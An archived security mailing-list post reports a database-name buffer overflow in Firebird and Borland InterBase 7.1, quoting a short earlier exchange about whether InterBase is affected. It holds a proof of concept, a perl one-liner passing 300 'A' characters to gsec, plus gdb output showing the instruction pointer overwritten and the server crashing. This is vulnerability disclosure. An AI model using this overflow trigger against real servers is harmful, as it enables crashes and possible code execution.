| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: kf_lists at secnetops.com (KF (lists))
Subject: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow
Someone that has had some success communicating things security wise to
Borland may wish to contact them about this.
[root@...neRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm
[kf@...neRiot bin]$ pwd
/opt/interbase/bin
[kf@...neRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'`
(gdb) c
Continuing.
[New Thread 1085279152 (LWP 21355)]
[New Thread 1095769008 (LWP 21356)]
[New Thread 1106258864 (LWP 21357)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1085279152 (LWP 21355)]
0x41414141 in ?? ()
(gdb) bt
#0 0x41414141 in ?? ()
#1 0x41414141 in ?? ()
#2 0x41414141 in ?? ()
...
#35 0x41414141 in ?? ()
#36 0x41414141 in ?? ()
(gdb)
(gdb) i r
eax 0x0 0
ecx 0x82025e4 136324580
edx 0x0 0
ebx 0x81fe29c 136307356
esp 0x40aff5f8 0x40aff5f8
ebp 0x41414141 0x41414141
esi 0x12c 300
edi 0x40affab8 1085274808
eip 0x41414141 0x41414141
eflags 0x10246 66118
(gdb) x/1s $esp
0x40aff5f8: 'A' <repeats 144 times>
[root@...neRiot interbase]# ./bin/ibserver
Segmentation fault
-KF
Noam Rathaus wrote:
>On Sunday 02 June 2002 01:52, KF (lists) wrote:
>
>
>>So is this firebird specific or does it also impact Borland Interbase
>>users?
>>-KF
>>
>>
>>
>We haven't tested Borland's Interbase as we didn't have any installation
>available for testing. However I can assume that since this vulnerability
>appears in version 1.0.2, which is of very close resemblance to Borland's
>Interbase sources, that the vulnerability may also affect it.
>
>
>
Powered by blists - more mailing lists